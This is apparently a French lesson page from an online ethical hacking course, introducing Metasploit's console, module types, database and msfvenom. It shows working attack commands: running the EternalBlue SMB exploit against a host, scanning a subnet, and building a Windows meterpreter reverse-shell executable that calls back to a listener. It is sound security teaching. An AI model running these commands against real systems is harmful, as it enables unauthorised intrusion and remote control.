0Pricing
Ethical Hacking Academy · Leçon

Architecture de Metasploit

Modules et console

Architecture de Metasploit est une leçon Ethical Hacking Academy gratuite sur CoddyKit. Ceci est la leçon 1 sur 4. Tu peux lire la leçon complète ci-dessous gratuitement — puis la pratiquer en direct dans le navigateur avec un éditeur de code intégré et un tuteur IA 24/7. Elle fait partie du parcours d'apprentissage Ethical Hacking Academy, et ta progression se synchronise sur le web et l'application CoddyKit. Le cours Ethical Hacking Academy comprend 4 leçons au total.

Qu’est-ce que Metasploit ?

Metasploit est le framework d’exploitation le plus utilisé. Il fournit une bibliothèque structurée d’exploits, de charges utiles et d’outils permettant de tester et de démontrer des vulnérabilités lors d’interventions autorisées.

Plutôt que d’écrire chaque attaque à partir de zéro, vous chargez des modules éprouvés, vous les configurez, puis vous les exécutez via une interface cohérente.

msfconsole

L’interface principale est msfconsole, un interpréteur de commandes interactif. Il propose la complétion par tabulation, l’historique des commandes et l’accès à tous les modules.

Vous le lancez depuis un terminal, puis vous travaillez entièrement dans son invite de commandes.

msfconsole
# msf6 > help

Types de modules

Metasploit organise ses fonctionnalités en types de modules :

  • exploit : code qui exploite une vulnérabilité.
  • payload : code qui s’exécute sur la cible après l’exploitation.
  • auxiliary : analyseurs de ports, outils de fuzzing et autres outils qui ne fournissent pas de charge utile.
  • post : actions post-exploitation sur un hôte compromis.
  • encoder et nop : aident les charges utiles à échapper à la détection.

Nommage des modules

Les modules utilisent un chemin hiérarchique qui indique précisément leur fonction. La lecture de ce chemin révèle le type, la plateforme et le service ciblé.

exploit/windows/smb/ms17_010_eternalblue
# type / platform / service / specific exploit

Exploits et charges utiles

Une distinction importante :

  • L’exploit est le moyen d’entrer ; il compromet le logiciel vulnérable.
  • La charge utile correspond à ce que vous voulez faire une fois à l’intérieur, par exemple ouvrir un interpréteur de commandes.

Vous les associez : un exploit peut fournir de nombreuses charges utiles différentes selon votre objectif et la cible.

Flux de travail des modules

L’utilisation de n’importe quel module suit un cycle répétable :

  • search pour rechercher un module.
  • use pour le charger.
  • Définir des options telles que RHOSTS et LHOST.
  • run ou exploit pour l’exécuter.

Cette uniformité explique pourquoi le framework peut s’étendre à des milliers de modules.

use exploit/windows/smb/ms17_010_eternalblue
show options
set RHOSTS 10.10.10.5
exploit

Base de données et options

Les paramètres des modules sont stockés dans le magasin de données. Chaque option peut être obligatoire ou facultative.

  • RHOSTS : adresse(s) de la cible distante.
  • RPORT : port distant.
  • LHOST : votre adresse d’écoute pour les connexions inversées.
  • LPORT : votre port d’écoute.

Utilisez show options pour voir ce dont un module a besoin avant de l’exécuter.

La base de données

Metasploit s’intègre à une base de données PostgreSQL pour stocker les hôtes, les services, les éléments récupérés et les identifiants découverts durant une intervention. Cela vous permet de suivre efficacement un périmètre important.

Démarrez-la avant de lancer la console afin que les résultats soient enregistrés automatiquement.

msfdb init
# Inside msfconsole:
# db_status   hosts   services   creds

Modules auxiliaires

Les modules auxiliary accomplissent des tâches utiles sans exploiter de vulnérabilité : analyse des ports, énumération des services, essais systématiques de connexions et fuzzing.

Ils constituent souvent votre première étape, en recueillant les informations nécessaires avant la sélection d’un exploit.

use auxiliary/scanner/smb/smb_version
set RHOSTS 10.10.10.0/24
run

msfvenom

msfvenom est un outil complémentaire qui génère des charges utiles autonomes sous forme de fichiers : exécutables, scripts ou shellcode que vous transmettez en dehors de la console.

Il réunit la génération et l’encodage des charges utiles en une seule commande, ce qui est utile pour les simulations d’hameçonnage ou la transmission personnalisée dans le cadre de tests autorisés.

msfvenom -p windows/meterpreter/reverse_tcp \
  LHOST=10.10.14.2 LPORT=4444 -f exe -o shell.exe

Espaces de travail

Pour plusieurs interventions, les espaces de travail de Metasploit maintiennent séparés dans la base de données les hôtes, les services et les éléments récupérés de chaque client. Vous pouvez passer de l’un à l’autre afin que les données ne se mélangent jamais entre les évaluations.

workspace -a clientA      # add a workspace
workspace clientA         # switch to it
workspace                 # list all

Vérification rapide

Vérifiez votre compréhension des types de modules.

Récapitulatif

Vous avez étudié l’architecture de Metasploit :

  • msfconsole est l’interface principale ; msfvenom construit des charges utiles autonomes.
  • Types de modules : exploit, payload, auxiliary, post, encoder/nop.
  • Les chemins des modules codent le type, la plateforme et le service.
  • Flux de travail : search, use, set options, run ; les paramètres sont stockés dans le magasin de données.
  • La base de données PostgreSQL suit les hôtes, les services et les éléments récupérés.

Ensuite : rechercher et utiliser efficacement les exploits.

Questions Fréquemment Posées

La leçon « Architecture de Metasploit » est-elle gratuite ?

Oui — le texte complet de « Architecture de Metasploit » est gratuit à lire ici sur le web. Pour la pratiquer de manière interactive (un éditeur de code intégré et un tuteur IA 24/7) et déverrouiller le reste du cours Ethical Hacking Academy, passe à CoddyKit PRO. Le cours Ethical Hacking Academy comprend 4 leçons au total.

Qu'est-ce que j'apprendrai dans « Architecture de Metasploit » ?

Modules et console Tu pratiques Ethical Hacking Academy avec du code pratique que tu exécutes directement dans le navigateur, et un tuteur IA 24/7 répond à tes questions au fur et à mesure que tu avances dans la leçon.

Dois-je avoir de l'expérience pour commencer Ethical Hacking Academy ?

Aucune expérience préalable n'est requise. Ethical Hacking Academy sur CoddyKit est structuré pour les débutants jusqu'aux apprenants avancés, donc tu peux commencer ici ou depuis le début et avancer à ton rythme. Ceci est la leçon 1 sur 4.

Combien de temps prend la leçon « Architecture de Metasploit » ?

La plupart des leçons CoddyKit prennent environ 5–10 minutes. Chacune est courte et interactive, tu progresses régulièrement et tu repiques exactement où tu t'es arrêté sur le web et l'app.

Peux-tu écrire et exécuter du code dans cette leçon Ethical Hacking Academy ?

Oui. Chaque leçon Ethical Hacking Academy inclut un éditeur de code intégré, tu écris et exécutes du vrai code directement dans ton navigateur et tu reçois des retours IA instantanés — aucune configuration locale requise.

Toutes les leçons de ce cours

  1. Architecture de Metasploit
  2. Rechercher et utiliser des exploits
  3. Charges utiles et Meterpreter
  4. Modules post-exploitation
← Retour à Ethical Hacking Academy